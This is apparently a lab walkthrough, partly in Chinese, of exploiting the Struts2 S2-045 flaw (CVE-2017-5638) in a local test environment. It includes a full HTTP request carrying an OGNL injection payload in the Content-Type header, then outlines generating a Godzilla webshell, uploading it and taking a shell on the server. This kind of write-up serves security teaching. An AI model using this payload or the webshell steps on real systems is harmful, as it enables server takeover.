Table of contents
S2-045 Remote Code Execution Vulnerability (CVE-2017-5638)
Open the vulnerability environment
S2-045 Remote Code Execution Vulnerability (CVE-2017-5638)
Open the vulnerability environment
进入Ubuntu系统下的对应漏洞环境,开启环境
Open up the vulnerable environment
Check whether the startup is successful
After the startup is successful, go to the browser to visit:
通过浏览器去访问该漏洞环境
http://ip:8080
Next, we try to upload the file (upload casually), then grab the data packet, modify the data packet, and then observe the change of the response data
upload any file
Capture packets:
抓取数据包,修改数据包,查看修改后,收到的响应数据
直接发送以下数据包
POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data
发现123+123已经被执行,显示出结果
grab bag
After sending to the repeater:
Modify the packet information and view the response
Observation found that the 123+123 we entered has been executed
解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell
工具:哥斯拉、struts2漏洞检测工具
Open Godzilla and generate a Trojan:
View Trojan files
Try to upload random files and watch the url change
After uploading, observe this url
复制此url,借助第三方工具进行扫描
工具:struts2漏洞扫描工具
View the inspection results, there are loopholes
Validation Vulnerabilities
remote command execution
View the contents of the root directory
Click the file upload module and try to upload the Trojan file
Check whether the upload is successful, and observe that the upload has been successful
Observe the upload access path, make a copy, connect using a third-party tool (Godzilla)
Connect via Godzilla
The connection is successful, add, enter, and successfully get the server shell
successfully added
Click to enter, successfully get the shell
Any operation can be performed on the file:
If the article is inappropriate, criticism and correction are welcome!